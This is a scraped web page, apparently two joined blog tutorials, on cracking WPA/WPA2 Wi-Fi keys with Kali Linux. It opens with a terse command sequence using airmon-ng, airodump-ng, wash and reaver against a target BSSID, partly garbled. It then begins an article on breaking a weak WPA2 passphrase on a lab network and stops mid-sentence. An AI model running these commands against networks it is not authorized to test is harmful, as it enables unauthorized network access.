Cracking WPA & WPA2 key with Reaver on Kali Linux (No Dictionary - Wordlist) Open terminal: airmon-ng airmon-ng stop [your interface] [My is wlan0] airodump-ng [your interface] [My is wlan0] Open new terminal: wash -i [your interface] [My is wlan0] -c CHANNEL_NUM -C -s Open new terminal: reaver -i [your interface] [My is wlan0] -b [BSSID] —fail-wait=360 Breaking WPA2-PSK with Kali Linux : wireless. WPA2-PSK may not be as safe as you think. There are a few attacks against WAP2-PSK. One of the most common attacks is against WPA2 is exploiting a weak passphrase. Below you will find a few easy steps on how to break WPA2 with a weak passphrase. Breaking the wireless Lab Home Network: I set up a test network for this blog article. The client box is logging into my wireless Lab test network. This is the network we will break. Selecting Wireless Network 300x274 Breaking WPA2 PSK with Kali Linux : wireless. Step 1: The first step is to verify the router configuration. N...